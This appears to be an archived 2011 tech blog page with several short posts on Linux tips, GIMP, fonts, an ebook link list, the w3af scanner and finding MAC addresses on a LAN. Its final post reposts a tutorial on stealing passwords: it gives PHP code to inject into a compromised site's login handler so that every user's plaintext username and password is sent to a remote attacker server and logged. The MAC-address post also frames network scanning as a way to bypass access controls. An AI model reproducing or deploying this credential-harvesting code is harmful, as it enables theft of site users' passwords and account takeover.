Saturday, 16 April 2011

100s of Ebooks For Download [Link]

I was just google searching when I found this site with 100s of ebooks under different categories and I thought to share the link over here.

Link: http://www.sudancs.com/Books/

Copy the above link and paste in your address bar. This link consists of 100s of ebooks for direct download under following different categories:

Algorithms & Data Structure/
Artificial Intelligence/
Compilers/
Computer Architecture/
Computer Forensics/
Computer Graphics/
Cryptography/
Database/
Graphic @ Dezing/
Hacker & Cracker/
Hardware/
Image Processing/
Mathematics @ Physics/
NetWork @ Wireless/
Operating System/
Others/
Programming language/
Robotics/
Security/
Simulation & Modeling/
Software @ Megazne/
Software Engineering & OOP/
Steganography/

I hope this is useful. Thanks. :)

Read more...

How to find MAC address of PC/device In Your Network

The MAC address of other PCs in LAN can be quite useful for some network protection bypassing such as internet access, etc. Today, I will show you how you can find the MAC address of any PC in your network.

Method 1: This method works in both windows and Linux. So open your terminal(in linux) or command prompt(in windows) and type:

ping <hostname>

Here, in place of <hostname>, type either computer's name or IP address whose MAC address you want to know.

Now, type the following command:

arp -a <hostname>

This will give you the arp entry cache of the specified hostname and this information also includes the MAC address of the PC. Sample output would be something like below:

techgaun.local (192.168.0.49) at 90:fb:a6:27:b7:6a [ether] on eth1

You can clearly spot the MAC address in the above output.

Method 2: This method is pretty useful and I do frequently use this tool to gather NetBIOS information of PCs in network. The tool I use is nbtscan and nbtscan is a program for scanning IP networks for NetBIOS name information. It sends NetBIOS status query to each address in supplied range and lists received information in human readable form. For each responded host it lists IP address, NetBIOS computer name, logged-in user name and MAC address (such as Ethernet).

The tool is available for download for windows and different distros of Linux from HERE.

Also, you can install it under ubuntu by issuing following command from terminal.

sudo apt-get install nbtscan

Now, the usage of this tool is pretty straightforward.

nbtscan <hostname>

This will give the NetBIOS information of the requested hostname. But, this isn't the only thing. We can also mass-scan the network by giving the IP range.

nbtscan 192.168.0.1-255

This scans all the devices within the range 192.168.0.1 - 192.168.0.255 and displays the NetBIOS information of the computers in network.

I hope this helps some of you. Thanks :)

Read more...

Thursday, 14 April 2011

Single Window Mode In GIMP

One of the basic problems GIMP has is lack of the single window mode and its so boring to see the multiple windows for each components of GIMP. Today, I'll list few of the ways to achieve single window mode in GIMP.

Method 1: Install the current development verion of GIMP i.e. 2.7 or higher and you'll have an option to run GIMP as single window mode. So you can install all the core dependencies (GEGL and BABL) and then install the GIMP2.7 from its source.

Method 2: Installing GIMPBox. GIMPBox is a python script that enables you to run gimp in the single window mode. To install it, type the following in the terminal.
sudo wget http://gimpbox.googlecode.com/hg/gimpbox.py -O /usr/local/bin/gimpbox && sudo chmod +x /usr/local/bin/gimpbox

Now, you can run GIMP in single window mode by just typing gimpbox in run command(ALT+F2).

Method 3: The third method is discussed in the ubuntuforums HERE

I hope these were helpful. Thanks. :)

Read more...

Web Application Attacking and Auditing with W3af Framework.

w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.

W3af is the tool written totally in Python and supports many techniques for detecting and exploiting the web based vulnerabilities.
Framework features

w3af provides plugin writers with this features:
urllib2 wrapper
In order to send requests to the remote server w3af uses urllib2. The xUrllib module of w3af is a wrapper of urllib2 to make the plugin writer life easier, using this wrapper a plugin writer can forget about proxy's, proxy auth, basic/digest auth, etc. This is the complete list of features provided by xUrllib:

- Proxy
- Proxy auth ( basic and digest )
- Site auth ( basic and digest )
- Gracefully handle timeouts
- UserAgent faking
- Add custom headers to requests
- Cookie handling
- Local cache for GET and HEAD requests
- Local dns cache, this will speed up scannings. Only one request is made to the DNS server
- Keep-alive support fot http and https connections
- File upload using multipart POST requests
- SSL certificate support

Output Management
w3af provides plugin writers with an abstraction layer for data output using the Output Manager. The output manager can also be extended using plugins and can be used for writing results to a txt/html file or sending them over the network using scp, the options are endless. Available ouput plugins are:
- Console
- Text file

Web Service support
w3af knows how to parse WSDL files, and audit webservices. Plugin developers can write a simple plugin that will be able to find bugs in web services and also in common HTTP applications.

HTTP headers fuzzing
w3af supports finding bugs in HTTP headers with great ease!

IPC
IPC ( inter plugin communication :P) can easily be done using the knowledge base, another w3af feature thats really usefull for plugin developers.

Session saving
Framework parameters can be saved to a file using the sessionManager. After that, you can load the settings and start the same scan again without configuring all parameters.

Fuzzer
Right now w3af has a really simple fuzzer, but we have plans to extend it. Fuzzers are great, we know it.

HTML / WML parsing
w3af provides HTML / WML parsing features that are really easy to use.

To install w3af under your ubuntu, type the following in the terminal.

sudo apt-get install w3af


Visit w3af homepage



Read more...

Wednesday, 13 April 2011

Cool ASCII Arts Using JAVE: A Free ASCII Editor

JavE is a free Ascii Editor. Rather than for editing texts, it is intended for drawing simple diagrams by using Ascii characters.
It is like a graphics editor for editing texts instead of images.

JavE is written in 100% pure Java and so should run on almost every operating system.
It is a standalone application and not available as applet.

Features

Freehand painting by mouse
FIGlet support - 195 fonts included
GIF/JPG/BMP to Ascii conversion with multiple options
crash recovery - edited documents can be recovered by JavE when starting the next time
Free shape selection tool
Easy textbox editing (borders, move, rescale)
Extendable clipart library
Export for multiple purposes (HTML, Java/C++/C/... comment)
move/copy/mirror/flip/rot13/...
And many many more - check it out!

Download Page of JavE



Read more...

Tuesday, 12 April 2011

How to add Alt key support in Photoshop Under Ubuntu

If you are using wine to run photoshop under your linux distribution, you might have come across this unfriendly problem of Alt key not working in photoshop. Alt key combination is very useful in photoshop as the shortcut to different tasks such as subtraction from selection and other tools and you might want to see this alt key working as per your wish.

The fix is pretty simple. By default, the window movement key is set to Alt because of which you can't use Alt key as you wish. But we can change this setting by going to System->Preferences->Windows. Under the Movement key, select the Super(i.e. windows logo) as the default movement key and now you can use the Alt key normally in photoshop. I've tested this in CS2 under ubuntu 10.10 but I guess it would work with any other versions as well.


I hope this helps some of you. :)

Read more...

Thursday, 7 April 2011

Installing nepali fonts in ubuntu

The default font installation folder in linux is /usr/share/fonts and if you want to add any new fonts, you need to copy the font files in this directory. We are dealing with installing nepali truetype fonts so our installation directory is /usr/share/fonts/truetype.

Press Alt+F2 and type gksudo nautilus /usr/share/fonts/truetype which will open the nautilus file explorer. Now copy all the *.ttf files into that folder and restart any program you want the fonts to be used in.

Another method which would make the fonts available only for the logged in user is by making a font directory in the home folder. First, create the new folder in the home directory.
mkdir ~/.fonts

Now, copy paste all the *.ttf files to this folder and restart any application where you want to use that font.

Read more...

How to steal password from login form

This article is written by neutralised of thesoftwareengineer.org but the domain has already expired so I thought to put this article here so that this small piece of information for beginner web hackers won't die.

-------------------------------------------------
[+] Login Form Password Stealing - Tutorial
[+] Author: Neutralise
[+] Location: http://thesoftwareengineer.org/services/tuts/LoginFormPassStealing.txt
--------------------------------------------------

Intro:
It seems that alot of people these days are gaining shell access, downloading a database then attempting to crack the hashes. If they are salted, sha1 or a hard to crack plain ole' MD5, they start bitchin and moaning when they can't get the plain text. So here it is, a tutorial on how to get user:pass format in plain text of ANY hash type.

Method:
Modify the login form of a site to catch the password remotely, before it is encrypted. I will explain this more simply via an example.
Take the following login form for example,

<form method="post" action="cookies.php">
<hr />
<p>
User: <input type="text" class="buttonstyle" name="username"></p>
<p>
Pass: <input type="password" class="buttonstyle" name="password"></p>
<p>
<input type="submit" value="Login" class="buttonstyle" name="submit"> 

<input type="reset" value="Reset" class="buttonstyle" /></p>
</form>

Now we can see that the action of this form points to 'cookies.php'. Now cookies.php will probably include a function similar to this depending on the encryption type, etc.

<?php
$user = $_POST['username'];
$pass = $_POST['password'];
if(md5($user) == $usermd5 && md5($pass) == $passmd5){
setcookie("Whatever", $cookie, time()+3600, "/");
header("Location: index.php");
die();
}
?>

Now on to bypassing the encryption before it happens, thus gaining the username and password in plain text we need to edit the 'cookie.php' site, add the following code at the start of the php tags.

<?php
$user = $_POST['username'];
$pass = $_POST['password'];
file_get_contents("http://site.com/plain.php?user=".$user."&pass=".$pass."");
?>>

Now the php file 'plain.php' will include the following code:

<?php
$user = $_GET['user'];
$pass = $_GET['pass'];
$file = "lol.txt";
$fp = fopen($file, "a");
fputs($fp, "$user:$pass\n");
fclose($fp);
?>>

Notice you will also need to upload a file 'lol.txt', and chmod it to 777.

Conclusion:
Now every time a user logs into the site you are editing the code of, it will send the username and password to the 'plain.php' text file and save it in 'log.txt', on a remoteserver in the format of:
user:pass

------------------------------
[+]^Neutralised.
------------------------------

Read more...